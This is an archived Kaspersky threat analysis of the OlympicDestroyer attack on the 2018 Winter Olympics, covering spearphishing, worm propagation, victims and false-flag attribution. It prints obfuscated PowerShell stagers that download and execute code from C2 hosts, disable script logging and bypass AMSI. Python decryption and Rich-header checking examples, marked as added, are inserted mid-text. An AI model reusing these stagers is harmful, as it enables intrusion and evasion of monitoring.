{
	"id": "b2331d58-9cc4-41ec-a3aa-1d83083135ed",
	"created_at": "2026-04-06T00:16:38.019647Z",
	"updated_at": "2026-04-10T13:12:50.685911Z",
	"deleted_at": null,
	"sha1_hash": "4023c65b386018e28197a57a61b698196ec5aa17",
	"title": "OlympicDestroyer is here to trick the industry",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1096753,
	"plain_text": "OlympicDestroyer is here to trick the industry\r\nBy GReAT\r\nPublished: 2018-03-08 · Archived: 2026-04-05 13:18:13 UTC\r\nA couple of days after the opening ceremony of the Winter Olympics in Pyeongchang, South Korea, we received\r\ninformation from several partners, on the condition of non-disclosure (TLP:Red), about a devastating malware attack on the\r\nOlympic infrastructure. A quick peek inside the malware revealed a destructive self-modifying password-stealing self-propagating malicious program, which by any definition sounds pretty bad.\r\nAccording to media reports, the organizers of the Pyeongchang Olympics confirmed they were investigating a cyberattack\r\nthat temporarily paralyzed IT systems ahead of official opening ceremonies, shutting down display monitors, killing Wi-Fi,\r\nand taking down the Olympics website so that visitors were unable to print tickets. We also found other attempts to wreak\r\nhavoc at companies working closely with the Winter Olympics.\r\nMalware features\r\nSeveral files related to the cyberattack were uploaded to VirusTotal on the day of the attack and were quickly picked up by\r\nother security researchers. As we were researching this attack, the Cisco Talos team published a brief description of the\r\nmalware which Talos got from an undisclosed source. In their blog Talos highlighted some similarities between the attack,\r\nNetya (Expetr/NotPetya) and BadRabbit (targeted ransomware).\r\nThe Talos publication effectively removed the TLP constraint as the information had now become public and could be\r\nreferenced in this way. 
However, we decided not to jump to conclusions, especially with regards to attribution, and spent\r\ntime researching it calmly and methodically, while we continued to discover more and more false flags and\r\ncontroversies in the malware.\r\nThe main malware module is a network worm that consists of multiple components, including a legitimate PsExec tool from\r\nSysInternals’ suite, a few credential stealer modules and a wiper. From a technical perspective, the purpose of the malware is\r\nto deliver and start the wiper payload, which attempts to destroy files on the remote network shares over the next 60 minutes.\r\nMeanwhile, the main module collects user passwords from browser and Windows storage and crafts a new generation of the\r\nworm that contains both the old and the freshly collected compromised credentials. The new generation of the worm is pushed to\r\naccessible local network computers and started using the PsExec tool, leveraging the collected credentials and current user\r\nprivileges.\r\nOnce the wiper has run for 60 minutes it cleans Windows event logs, resets backups, deletes shadow copies from the file\r\nsystem, disables the recovery item in the Windows boot menu, disables all the services on the system and reboots the\r\ncomputer. Those files on the network shares that it managed to wipe within 60 minutes remain destroyed. The malware\r\ndoesn’t use any persistence and even contains protection (also a killswitch) against recurring reinfection. Incidentally, only\r\nremote files of up to 1MB are fully overwritten with zeroes; larger files were wiped with just 1KB of zeroes in the header. The\r\nlocal files are not destroyed and the worm doesn’t wipe itself or its components.\r\nFig.1 OlympicDestroyer component relations\r\nReconnaissance stage\r\nSeveral companies have blogged about OlympicDestroyer’s attribution, its features and propagation method, but no one has\r\ndiscovered how exactly it was launched and from where. 
That’s where we had a little bit more luck.\r\nhttps://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/\r\nPage 1 of 11\n\nSince December 2017 security researchers have been seeing samples of MS Office documents in spearphishing emails\r\nrelated to the Winter Olympics uploaded to VirusTotal. The documents contained nothing but slightly formatted gibberish to\r\nmake it look like the text had an encoding problem, encouraging the user to press a button to “Enable Content”.\r\nFig.2 Screenshot of attachment from a spearphishing email.\r\nWhen the victim “enables content”, the document starts a cmd.exe with a command line to execute a PowerShell scriptlet\r\nthat, in turn, downloads and executes a second stage PowerShell scriptlet and, eventually, backdoors the system. The only\r\napparent link between this email campaign and OlympicDestroyer would have been the target; however, we managed to\r\ndiscover a couple of connections between this weaponized document and the attack in Pyeongchang which make us believe\r\nthey are related.\r\nFor this investigation, our analysts were provided with administrative access to one of the affected servers located in a hotel\r\nbased in Pyeongchang county, South Korea. A triage analysis was conducted on this Windows server system. The affected\r\ncompany also kindly provided us with the network connections log from their network gateway. Thanks to this, we\r\nconfirmed the presence of malicious traffic to a malicious command and control server at IP 131.255.*.* which is located in\r\nArgentina. 
The infected host established multiple connections to this server on ports from the following list:\r\n443\r\n4443\r\n8080\r\n8081\r\n8443\r\n8880\r\nThe server in Argentina was purchased from a reseller company in Bulgaria, which kindly assisted us in this investigation.\r\nThe company shared that the server was purchased from Norway, by a person using a Protonmail account:\r\nName: Simon ***\r\nEmail: simon***@protonmail.com\r\nLast Login Date: 2018-02-07 16:09\r\nIP Address: 82.102.*.* (Norway)\r\nServer purchased on: 2017-10-10\r\nWe were able to further connect this to a suspicious looking domain, with a registration address and phone number from\r\nSweden:\r\nDomain: microsoft******[.]com\r\nRegistration name: Elvis ****\r\nEmail: elvis***@mail.com\r\nRegistration date: 2017-11-28\r\nBefore getting suspended in December 2017 for failing the ICANN email verification check, the domain registration was\r\nprivacy-protected. This shielded the registration data, except the DNS servers, which indicate it was purchased via\r\nMonoVM, a VPS provider that accepts bitcoin:\r\nName Server: monovm.earth.orderbox-dns[.]com\r\nName Server: monovm.mars.orderbox-dns[.]com\r\nName Server: monovm.mercury.orderbox-dns[.]com\r\nName Server: monovm.venus.orderbox-dns[.]com\r\nName server history:\r\nFig.3 Name server history for microsoft*****.com\r\nThe elvis***@mail.com address also popped up as a contact detail for a small network inside the 89.219.*.* range that is located in Kazakhstan. This\r\nis where the trail ends for now. We apologize for not disclosing the full information as we would like to avoid random\r\ninteractions with this contact. Full information has been provided to law enforcement agencies and customers subscribed to\r\nour APT Intel reporting service.\r\nTo manage the server in Argentina, Simon *** used the IP address in Norway (82.102.*.*). 
This is the gateway of a VPN\r\nservice known as NordVPN (https://nordvpn.com/) that offers privacy-protected VPN services for bitcoins.\r\nIt’s not the first time the name NordVPN has cropped up in this case. We previously saw a weaponized Word document used\r\nin spearphishing emails targeting the Winter Olympics that contained something that looked like garbage text taken from a\r\nbinary object (e.g. pagefile or even raw disk). However, part of the random data included two clearly readable text strings\r\n(highlighted below) that made it into the document (md5: 5ba7ec869c7157efc1e52f5157705867) for no obvious reason:\r\nFig. 4 A reference to NordVPN openvpn config file\r\nOf course, this is a low confidence indicator, but seems to be another link between the spearphishing campaign on the\r\nWinter Olympics and the attackers responsible for launching the OlympicDestroyer worm. In addition, this document\r\nincludes a PowerShell command that closely resembles the PowerShell backdoor found in the network of the\r\nOlympicDestroyer victim. A comparison of this code is available below.\r\nThe PowerShell scripts listed below were used in the weaponized documents and as standalone backdoors. As standalone\r\nfileless backdoors, they were built and obfuscated using the same tool. 
Both scripts use a similar URL structure and both\r\nimplement RC4 in PowerShell, as well as using a secret key passed to the server in base64 via cookies.\r\nSpearphishing case in South Korea:\r\n(  gCi VariABLE:FzS3AV  ).\"VaLUE\"::\"expecT100cOnTiNUe\"=0;\r\n${wC}=^\u0026NEW-ObjecT System.Net.Webclient;${u}=Mozilla/5.0 (Windows NT 6.1;WOW64; Trident/7.0; rv:11.0)like Gecko;\r\n(  GCI VARiabLe:fZS3aV ).\"vAlUe\"::\"seRVeRCeRTiFICaTEVALIDATIoNCALlbAck\" = {${tRUE}};\r\n${wC}.\"hEADERs\".Add.Invoke(User-Agent,${U});\r\n${WC}.\"PROXy\"=  ( variaBLe  (\"fX32R\") -VAlUeO )::\"DefaultWebProxy\";\r\n${wc}.\"pRoxY\".\"CREdENtials\" =  ( GET-vaRiABle ('hE7KU')).\"VAlue\"::\"dEFauLTNeTWOrkCREdENTIALs\";\r\n${K}=  $XNLO::\"asCiI\".GetBytes.Invoke(5e2988cfc41d844e2114dceb8851d0bb);\r\n${R}=\r\n{\r\n  ${D},${K}=${ArGs};\r\n  ${s}=0..255;0..255^|^\u0026('%')\r\n  {\r\n    ${j}=(${j}+${s}[${_}]+${k}[${_}%${K}.\"couNt\"])%256;\r\n    ${s}[${_}],${S}[${J}]=${s}[${J}],${S}[${_}]\r\n  };\r\n  ${d}^|^\u0026('%')\r\n  {\r\n    ${I}=(${I}+1)%256;\r\n    ${h}=(${H}+${s}[${I}])%256;\r\n    ${S}[${I}],${s}[${H}]=${s}[${H}],${S}[${I}];\r\n    ${_}-BxoR${S}[(${s}[${I}]+${S}[${H}])%256]}\r\n};\r\n${Wc}.\"hEadeRS\".Add.Invoke(cookie,session=ABWjqj0NiqToVn0TW2FTlHIAApw=);\r\n${SER}=https://minibo***[.]cl:443;\r\n${T}=/components/com_tags/controllers/default_tags.php;\r\n${dATa}=${Wc}.DownloadData.Invoke(${seR}+${T});\r\n${IV}=${DATA}[0..3];\r\n${dAta}=${DaTA}[4..${dAtA}.length];\r\n-jOin[ChaR[]](^\u0026 ${R} ${DAtA} (${IV}+${K}))^|.IEX  \u0026\u0026SeT   RMN=ecHo InvoKe-expRESsIon  ([ENVirOnMeNt]::gETeNvIroNMENTvarIaBlE('svTI','procEsS'))  ^|\r\npOWErshEll -NOnint  -wiNdOWSt hiddeN -NoEXiT  -NoprOFilE -ExECuTiONPOLIcy  bYpASs     -  \u0026\u0026 CMd.exE   /c%Rmn%\r\nPowerShell found on OlympicDestroyer victim (lines cut off at the right margin in the archived copy):\r\nIf($PSVERsIoNTAbLe.PSVeRsIon.MA\r\n[ReF].ASSEmbly.GETTYPE('System.M\r\n('cachedGroupPolicySettings','N'+'onPub\r\nIf($GPS['ScriptB'+'lockLogging']){$GP\r\n['EnableScriptB'+'lockLogging']=0;\r\n$GPS['ScriptB'+'lockLogging']\r\n['EnableScriptBlockInvocationLogging']\r\n('signatures','N'+'onPublic,Static').SETV\r\nCoLLectIOnS.GeNeRIC.HAshSet[stRin\r\n[ReF].AssEmbLY.GETTYPe('System.M\r\n{$_}|%\r\n{$_.GEtField('amsiInitFailed','NonPubli\r\n};\r\n[SYStem.NeT.SerVicePoinTMANAGeR\r\n$wC=NeW-ObJect SySTem.NEt.WEBC\r\n$u='Mozilla/5.0 (Windows NT 6.1; WOW\r\n$Wc.HEADErS.Add('User-Agent',$u);\r\n$wC.ProXY=[SYsTeM.NET.WeBREqU\r\n$wC.PROxY.CredentIAlS =\r\n[SYsTem.NEt.CRedeNTialCacHe]::DeF\r\n$Script:Proxy = $wc.Proxy;\r\n$K=[SysTEM.Text.ENcOding]::ASCII.G\r\no@qRl\u003e.:FPev7rtNb^|#im');\r\n$R=\r\n{\r\n$D,$K=$ARgs;\r\n$S=0..255;0..255|%{$J=($J+$S[$_]+$K\r\n$S[$_],$S[$J]=$S[$J],$S[$_]};\r\n$D|%\r\n  {\r\n   $I=($I+1)%256;\r\n   $H=($H+$S[$I])%256;\r\n   $S[$I],$S[$H]=$S[$H],$S[$I];\r\n   $_-bxor$S[($S[$I]+$S[$H])%256]\r\n  }\r\n};\r\n$ser='http://131.255.*.*:8081';\r\n$t='/admin/get.php';\r\n$wc.HeAders.Add(\"Cookie\",\"session=z\r\n$daTA=$WC.DownlOADDATA($ser+$\r\n$iV=$DATa[0..3];\r\n$datA=$dATa[4..$data.leNgth];\r\n-joiN[CHAR[]](\u0026 $R $dAta ($IV+$K))\r\nLateral movement\r\nDespite the network worm’s self-replicating feature, the attackers did some manual lateral movement before starting on the\r\ndestructive malware. We believe this was done to look for a better spot to release the worm. They seemed to be moving\r\nthrough the network via PsExec and stolen credentials, opening a default meterpreter port (TCP 4444) and downloading and\r\nrunning a backdoor (meterpreter). 
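The two PowerShell scripts above share the RC4 scriptblock and the 4-byte IV prefix on the server reply, and both can be reproduced offline, which is what an analyst needs in order to read a captured second stage once the staging key has been lifted from the stager. The block below is an added example, not code from this post or from either script: the key, IV and payload it uses are constructed for the example.

```python
import base64

# Added example (not code from the Securelist post or from the captured scripts):
# a Python re-implementation of the RC4 routine in the $R scriptblock and of the
# IV-prefixed stage handling, so a captured C2 reply can be decrypted offline once
# the staging key is known.


def rc4(key, data):
    # Key scheduling as in the scriptblock: j = (j + S[i] + K[i % len(K)]) % 256, swap S[i], S[j]
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    # Keystream generation: I and H counters, output byte XOR S[(S[I] + S[H]) % 256]
    out = bytearray()
    i = h = 0
    for byte in data:
        i = (i + 1) & 0xFF
        h = (h + s[i]) & 0xFF
        s[i], s[h] = s[h], s[i]
        out.append(byte ^ s[(s[i] + s[h]) & 0xFF])
    return bytes(out)


def decrypt_stage(reply, staging_key):
    # Server reply layout seen in both scripts: first 4 bytes are an IV, the rest
    # is RC4(IV + staging_key, stage); the stager then feeds the result to IEX.
    if len(reply) < 5:
        raise ValueError('reply too short to hold a 4-byte IV and a stage')
    iv, body = reply[:4], reply[4:]
    return rc4(iv + staging_key, body)


def encrypt_stage(stage, staging_key, iv):
    # Inverse operation, used here only to construct a sample reply (RC4 is symmetric).
    if len(iv) != 4:
        raise ValueError('IV must be exactly 4 bytes')
    return iv + rc4(iv + staging_key, stage)


def session_cookie_value(cookie_header):
    # Both stagers send a session=<base64> cookie; return the decoded raw bytes
    # so the token length and structure can be compared across captures.
    for part in cookie_header.split(';'):
        name, _, value = part.strip().partition('=')
        if name == 'session':
            return base64.b64decode(value)
    raise ValueError('no session cookie present')


# Constructed sample: key, IV and stage are made up for this example, not taken
# from the captured scripts.
SAMPLE_KEY = b'0123456789abcdef0123456789abcdef'
SAMPLE_IV = bytes([0x10, 0x20, 0x30, 0x40])
SAMPLE_STAGE = b'Write-Output stage2-loaded'
SAMPLE_REPLY = encrypt_stage(SAMPLE_STAGE, SAMPLE_KEY, SAMPLE_IV)


def demo():
    # What an analyst does with a pcap: pull the HTTP body, decrypt it with the key
    # recovered from the stager, and read the second stage in the clear.
    return decrypt_stage(SAMPLE_REPLY, SAMPLE_KEY).decode('ascii')
```

decrypt_stage does what the last lines of each script do before IEX, and session_cookie_value recovers the raw bytes behind the session cookie so tokens from different captures can be compared by length and structure rather than as opaque strings.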
The attackers also checked the network configuration, potentially searching for servers\r\nattached to multiple networks or VPN links in order to penetrate adjacent networks that could be linked to the Olympic\r\nCommittee infrastructure.\r\nOne of the hosts in the network of the affected ski resort hotel had Kaspersky Lab’s system watcher component enabled,\r\nwhich collected quite a few of the artifacts used by the attackers for lateral movement. According to the telemetry from this\r\nhost, the attackers entered the system on 6 February, 2018. They used three types of PowerShell scriptlets: TCP 4444 port\r\nopener, ipconfig launcher and a downloader.\r\nBased on telemetry we received from one of the hosts, we built a timeline of the attackers’ activity and a histogram showing\r\nwhen the attackers started executables on the system.\r\nFig.5 Histogram with attacker activity per hour of day\r\nFrom this we can see that the attackers were mostly busy outside of office hours according to Korean Standard Time\r\n(UTC+9), perhaps to attract less attention or simply due to their own timezone.\r\nWorm propagation\r\nOlympicDestroyer is a network worm that collects user credentials with hostnames. New data is appended to the end of an\r\nexisting collection. Having multiple samples of the worm from different networks allows us to reconstruct the path of the\r\nworm and find the source of distribution (or at least its hostname and list of users).\r\nFig.6 OlympicDestroyer worm propagation\r\nThe diagram above was built based on extracted lists of credentials with hostnames and some alleged roles of the servers\r\nbased on respective names. 
We can see there were at least three independent launch pads for the worm: the Atos.net company,\r\nski resort hotels, and the Pyeongchang2018.com server.\r\nAt some point, samples with a list of credentials were uploaded to VirusTotal where they were found by security researchers\r\nwho executed the worm in a sandbox environment and uploaded the new generation to VirusTotal again. There are a number\r\nof samples on VT that contain credentials from those sandbox machines. Nevertheless, it’s clear the network worm wasn’t\r\nstarted there initially, but was instead coming from one of the known launch pads.\r\nVictims\r\nSpearphishing emails were used to target the networks of official partners of the Winter Olympics. The attackers probably\r\nwent to the official website to find out the names of the partner companies, figured out their domain names, collected known\r\nemail addresses and started bombarding them with spearphishes.\r\nOne of these weaponized documents was uploaded to VT from South Korea on 29 December, 2017 inside an email file\r\n(6b728d2966194968d12c56f8e3691855). The sender address imitates the South Korean NCTC (National Counter-Terrorism\r\nCenter), while the sender’s server IP originates from a server in Singapore.\r\nFig.7 Fake sender address.\r\nThe email appears to have been sent to icehockey@pyeongchang2018[.]com. 
However, the real targets are in the following\r\nlist:\r\nIndustry | Target company/organization domain\r\nGovernment organization | airport.co.kr, customs.go.kr, kepco.co.kr, kma.go.kr, korail.com, korea.kr, pyeongchang2018.com, sports.or.kr\r\nEnterprise | sk.com, kt.com\r\nEnergy | esco-posco.co.kr, posco.co.kr\r\nSemiconductor | skhynix.com, us.skhynix.com\r\nTransport | koreanair.com, hanjin.co.kr\r\nHospital | gnah.co.kr\r\nMedia | donga.com\r\nAdvertising | ppcom.kr, samikdisplay.co.kr (LED display company), tkad.co.kr, vestceo@naver.com (LED panel advertising company email)\r\nResort/Hotel | alpensiaresort.co.kr, yongpyong.co.kr\r\nThe attackers appear to have got sloppy when they searched for email addresses ending with the targeted domains. Matching\r\non short domain names such as sk.com or kt.com wasn’t a good idea: it went unnoticed that a few totally unrelated\r\ncompanies with domain names ending in sk.com or kt.com also received spearphishing emails:\r\nkrovy-sk.com (Wood company in Slovakia)\r\nokc-sk.com (Mining-related company in Canada)\r\nbcel-kt.com (Finance company in Laos)\r\nkuhlekt.com (Software company in Australia)\r\nwertprojekt.com (Real estate company in Germany)\r\nBased on all the evidence we discovered, the following networks seem to have been breached in the attack:\r\nSoftware vendor responsible for automation at ski resorts\r\nTwo ski resort hotels in South Korea\r\nIT service provider (Atos.net) headquartered in France\r\ncom attached network\r\nConsidering the malware was spread as a network worm via Windows network shares, collateral damage was inevitable.\r\nThrough one of the victims who uploaded the dropper file to VT from Austria, we were able to extract the hostname from\r\nthe stolen credentials stored in the malware: ATVIES2BQA. 
While it may look like a random sequence of characters at first\r\nglance, we speculate that AT stands for the host country code (Austria), which matches the submitter source country,\r\nfollowed by the organization name “VIES” with some extra random characters uniquely identifying the host. According to\r\nOSINT, there is only one large organization that matches this name in Austria – the VAT Information Exchange System\r\nused throughout the European Union. VIES is a search engine owned by the European Commission. So, it’s either a\r\ncompromised host of Atos whose role is to communicate with the Austrian VIES, or the Austrian VIES is indeed collateral\r\ndamage of the malware’s network propagation.\r\nBut the main outbreak of the worm that we investigated was at a hotel in a South Korean winter resort. The hotel didn’t\r\nupload any samples to VT, which is why it remained unknown. We assume many other companies attacked in South Korea\r\ndid the same, which reduced the visible surface of the attacked infrastructure.\r\nWhile we cannot name the hotel chain, we can say that one of its hotels located in a ski resort in Pyeongchang was subjected\r\nto an attack. Despite the close proximity to the Olympic Games, the resort was not one of the official winter parks staging\r\nthe games. However, it is definitely part of the surrounding infrastructure that hosted numerous guests and possibly even\r\nsports teams competing at the Olympics. In an interview with the owners, we found out that the malware disabled ski gates\r\nand ski lifts that were operated from one of the attacked servers. Our analysis showed that this was not collateral damage.\r\nThe attackers deliberately chose to start the spread of the destructive worm from this dedicated ski resort automation server.\r\nThat server was the so-called patient-zero in the network. 
The timing was also chosen to precede the official opening\r\nceremony by a couple of hours, allowing the worm to propagate deep enough into networks to cause maximum\r\ninconvenience for those using the affected infrastructure. We believe the plan was also to let the worm gain better\r\nvisibility in the news.\r\nAttribution hell\r\nIn their blog the Cisco Talos researchers also pointed out that OlympicDestroyer used similar techniques to BadRabbit and\r\nNotPetya to reset the event log and delete backups. Although the intention and purpose of both implementations of the\r\ntechniques are similar, there are many differences in the code semantics. It’s definitely not copy-pasted code, and because the\r\ncommand lines were publicly discussed on security blogs, these simple techniques became available to anyone who wanted to\r\nuse them.\r\nFig.8 Event logs cleaning and disabling system recovery in OlympicDestroyer and NotPetya\r\nSoon after the Talos publication, Israeli company IntezerLabs tweeted that they had found links to Chinese APT groups.\r\nFig.9 Announcement of connection to Chinese APTs by IntezerLabs on 12 Feb, 2018\r\nIntezerLabs released a blogpost with an analysis of features found using their in-house malware similarity technology.\r\nA few days later media outlets started publishing articles suggesting potential motives and activities by Russian APT groups:\r\n“Crowdstrike Intelligence said that in November and December of 2017 it had observed a credential harvesting operation\r\noperating in the international sporting sector. 
At the time it attributed this operation to Russian hacking group Fancy\r\nBear…”.\r\nOn the other hand, Crowdstrike’s own VP of Intelligence, Adam Meyers, in an interview with the media said: “There is no\r\nevidence connecting Fancy Bear to the Olympic attack”.\r\nHowever, a couple of weeks later, the Russian trace was brought up again by the Washington Post, which claimed that\r\nRussian military spies were behind the Winter Olympics attack, citing “two U.S. officials who spoke on the condition of\r\nanonymity”. Unfortunately, such articles based on anonymous sources contain no verifiable information and bring no real\r\nanswers – they only spread rumors.\r\nMicrosoft’s security team also seems to have been tricked by the malware as their internal detection was triggered on the\r\npotential use of the EternalRomance exploit (MS17-010).\r\nFig.10 Microsoft security team claims they found EternalRomance in OlympicDestroyer\r\nA couple of days later Microsoft had to retract those claims as they were simply not confirmed.\r\nFig.11 Microsoft security team retracts previous claims in a subsequent tweet\r\nThe day after we released a private report with forensic findings and detailed analysis of this attribution hell to our APT Intel\r\nsubscribers (for more information please contact: intelreports@kaspersky.com), the Cisco Talos team decided to revisit\r\nOlympicDestroyer and go public with a similar review. 
We can’t help but agree with this nice write-up with code\r\ncomparison, because we came to very similar conclusions.\r\nIn addition, Talos researchers noted that the evtchk.txt filename, which the malware used as a potential false flag during its\r\noperation, was very similar to the filenames (evtdiag.exe, evtsys.exe and evtchk.bat) used by BlueNoroff/Lazarus in the\r\nBangladesh SWIFT cyberheist in 2016.\r\nRecorded Future decided not to attribute this attack to any actor; however, they claimed that they found similarities to the\r\nLimaCharlie malware loaders of BlueNoroff/Lazarus, a group widely believed to be a North Korean actor.\r\nWe can’t dispute that part of the code really does resemble the Lazarus code. The wiper modules used in OlympicDestroyer\r\n(MD5: 3c0d740347b0362331c882c2dee96dbf) and Bluenoroff (MD5: 5d0ffbc8389f27b0649696f0ef5b3cfe) used similar\r\ncode to wipe files.\r\nFig.12 Comparison of wiping module (left: Bluenoroff tool; right: OlympicDestroyer)\r\nThere is also a high level of similarity between Lazarus and OlympicDestroyer. There are modules in both campaigns that\r\nused the same technique to decrypt a payload in memory using a secret password provided via a command line. Lazarus\r\nused this in their malware loaders (Recorded Future also mentions a similarity in malware loader code) to protect their\r\nbackdoor modules from reverse engineering as they contained some default C2 information.\r\nDespite the resemblance in the method, there are significant differences in its usage:\r\n1. Lazarus used long and reliable alphanumeric passwords (30+ characters long). OlympicDestroyer on the contrary\r\nused a very simple password: “123”.\r\n2. Lazarus never hardcoded its passwords for protected payloads into the malware body. 
OlympicDestroyer on the\r\ncontrary hardcoded it (there was actually no other way, because the worm had to spread itself and run fully\r\nautonomously). That’s why the whole idea of using password-protected payloads in a network worm looks\r\nridiculous, and we believe it’s unlikely an actor such as Lazarus would implement techniques like that considering\r\ntheir previous TTPs.\r\nThe possibility of North Korean involvement looked way off the mark, especially since Kim Jong-un’s own sister attended the\r\nopening ceremony in Pyeongchang. According to our forensic findings, the attack was started immediately before the\r\nofficial opening ceremony on 9 February, 2018.\r\nWhat we discovered next came as a big shock. Using our own in-house malware similarity system we discovered a\r\nunique pattern that linked Olympic Destroyer to Lazarus. A combination of certain code development environment features\r\nstored in executable files, known as the Rich header, may be used as a fingerprint identifying the malware authors and their\r\nprojects in some cases. In the case of the Olympic Destroyer wiper sample analyzed by Kaspersky Lab this “fingerprint” gave a\r\n100% match with previously known Lazarus malware components and zero overlap with any other clean or malicious file\r\nknown to date to Kaspersky Lab.\r\nYet the motives and other inconsistencies with Lazarus TTPs made some of our researchers skeptically revisit that rare\r\nartefact. With another careful look at this evidence and manual verification of each feature we discovered that the set of\r\nfeatures doesn’t match the actual code. At that moment it became clear that the set of features was simply forged to perfectly\r\nmatch the fingerprint used by Lazarus. 
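A Rich header fingerprint of the kind discussed above can be cross-checked against the rest of the executable instead of being trusted on its own. The following is an added example, not code from this post or from Kaspersky Lab: it parses the Rich header, recomputes the checksum stored as its XOR key over the DOS header and the entries, and compares the toolset builds the header claims against the linker version recorded in the PE optional header. The checksum algorithm follows the published reverse engineering of the format, the build-to-linker table is a deliberately partial assumption, the product ids in the sample headers are placeholders, and the post itself does not say which inconsistency exposed the forgery.

```python
import struct

# Added example (not code from the Securelist post or from Kaspersky Lab): a minimal
# Rich header parser with two cross-checks, showing how a transplanted header can
# be tested against the rest of the PE file rather than trusted as a fingerprint.

DANS_MARKER = 0x536E6144   # the DWORD 'DanS' read little-endian
RICH_TAG = b'Rich'
E_LFANEW_OFFSET = 0x3C

# Partial table (an assumption of this example, extend for real use) mapping the
# MSVC toolset build number found in the low word of a Rich header entry to the
# MajorLinkerVersion a binary linked with that toolset carries in its optional header.
BUILD_TO_LINKER_MAJOR = {8168: 6, 50727: 8, 21022: 9, 30729: 9, 30319: 10}


def rol32(value, count):
    count &= 31
    return ((value << count) | (value >> (32 - count))) & 0xFFFFFFFF


def rich_checksum(image, dans_offset, entries):
    # The key stored after 'Rich' is a checksum of every byte before the DanS
    # marker (the 4 bytes of e_lfanew excluded) plus each (compid, count) pair.
    checksum = dans_offset
    for i in range(dans_offset):
        if E_LFANEW_OFFSET <= i < E_LFANEW_OFFSET + 4:
            continue
        checksum = (checksum + rol32(image[i], i)) & 0xFFFFFFFF
    for cid, count in entries:
        checksum = (checksum + rol32(cid, count)) & 0xFFFFFFFF
    return checksum


def compid(product_id, build):
    return (product_id << 16) | build


def parse_rich_header(image):
    e_lfanew = struct.unpack_from('<I', image, E_LFANEW_OFFSET)[0]
    rich_offset = image.find(RICH_TAG, 0x40, e_lfanew)
    if rich_offset < 0:
        return None
    key = struct.unpack_from('<I', image, rich_offset + 4)[0]
    # Walk back one DWORD at a time, unmasking with the key, until DanS appears.
    dans_offset = rich_offset - 4
    while dans_offset >= 0x40:
        if (struct.unpack_from('<I', image, dans_offset)[0] ^ key) == DANS_MARKER:
            break
        dans_offset -= 4
    else:
        return None
    entries = []
    # Skip DanS plus three padding DWORDs, then read (compid, count) pairs.
    for offset in range(dans_offset + 16, rich_offset, 8):
        masked_id, masked_count = struct.unpack_from('<II', image, offset)
        entries.append((masked_id ^ key, masked_count ^ key))
    # MajorLinkerVersion sits at PE signature (4) + COFF header (20) + Magic (2).
    major_linker = image[e_lfanew + 26]
    builds = {cid & 0xFFFF for cid, _ in entries if cid & 0xFFFF}
    known_majors = [BUILD_TO_LINKER_MAJOR[b] for b in builds if b in BUILD_TO_LINKER_MAJOR]
    return {
        'entries': [(cid >> 16, cid & 0xFFFF, count) for cid, count in entries],
        'checksum_valid': rich_checksum(image, dans_offset, entries) == key,
        'major_linker': major_linker,
        # None when no build in the table is present; True only if the header
        # names a toolset whose linker matches what the optional header says.
        'linker_consistent': (major_linker in known_majors) if known_majors else None,
    }


def build_sample_pe(entries, major_linker, minor_linker=0, key=None):
    # Constructed minimal image for this example: MZ header, zeroed 64-byte stub,
    # Rich header at 0x80, then a PE signature, COFF header and the start of an
    # optional header. Passing key= writes a header whose key was never recomputed.
    dans_offset = 0x80
    e_lfanew = dans_offset + 16 + 8 * len(entries) + 8
    dos = bytearray(dans_offset)
    dos[0:2] = b'MZ'
    struct.pack_into('<I', dos, E_LFANEW_OFFSET, e_lfanew)
    if key is None:
        key = rich_checksum(dos, dans_offset, entries)
    rich = bytearray(struct.pack('<IIII', DANS_MARKER ^ key, key, key, key))
    for cid, count in entries:
        rich += struct.pack('<II', cid ^ key, count ^ key)
    rich += RICH_TAG + struct.pack('<I', key)
    nt_headers = b'PE' + bytes(2) + bytes(20) + struct.pack('<HBB', 0x10B, major_linker, minor_linker)
    return bytes(dos + rich + nt_headers)


# Product ids below are placeholders; only the build numbers and counts matter here.
TOOLSET_VS2010 = [(compid(0x9D, 30319), 1), (compid(0xAA, 30319), 12), (compid(0x01, 0), 40)]
TOOLSET_VS6 = [(compid(0x04, 8168), 3), (compid(0x0A, 8168), 20), (compid(0x01, 0), 15)]
```

The caveat worth keeping in mind: a Rich header copied wholesale from another MSVC binary with the same DOS stub still passes the checksum, because e_lfanew is excluded and the stub bytes are identical, so a forged header that claims an old toolset inside a binary whose optional header says linker 10.0 is caught only by the linker cross-check, while entries rewritten without recomputing the key fail the checksum outright.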
Considering that this is not a very well explored area in malware analysis and\r\nattribution, we decided to share more information on how we proved it in a dedicated blogpost with some deep technical\r\ndetails.\r\nWe also noticed that there exists a wiper module with the original Rich header, and it was uploaded to VirusTotal from France,\r\nwhere one of the victims (Atos) is located. The compilation timestamp was 2018-02-09 10:42:19, which is almost 2 hours\r\nafter the attack in Pyeongchang ski resorts started. It’s unclear what went wrong, but it looks like the attackers rushed to modify\r\nthe worm’s wiper component so that it immediately disabled system services and rebooted the machine instead of waiting\r\nfor 60 minutes. They seem to have wanted immediate results, as there were just minutes before the official opening ceremony\r\nstarted.\r\nConsidering all of the above, it now looks like a very sophisticated false flag which was placed inside the malware\r\nintentionally in order to give threat hunters the impression that they had found smoking-gun evidence, knocking them off the trail to\r\naccurate attribution.\r\nConclusions\r\nWhat conclusions can we draw from this?\r\nIt really depends on how clever the attacker behind this campaign is.\r\nIf Lazarus was the smartest of all, then they could have crafted a sophisticated false flag that would be hard to discover,\r\nrequiring even more sophistication to prove it’s a forgery. However, the level of researcher sophistication is something that’s\r\ndifficult for attackers to gauge. The level of complexity we’re talking about would definitely reduce reliability and couldn’t\r\nguarantee that everything went to plan. In addition, Lazarus had no rational motive to conduct this attack, not to mention\r\nTTPs that obviously weren’t theirs.\r\nSpeaking of TTPs, we have seen the attackers using NordVPN and MonoVM hosting. Both services are available for bitcoins,\r\nwhich makes them the perfect tool for APT actors. 
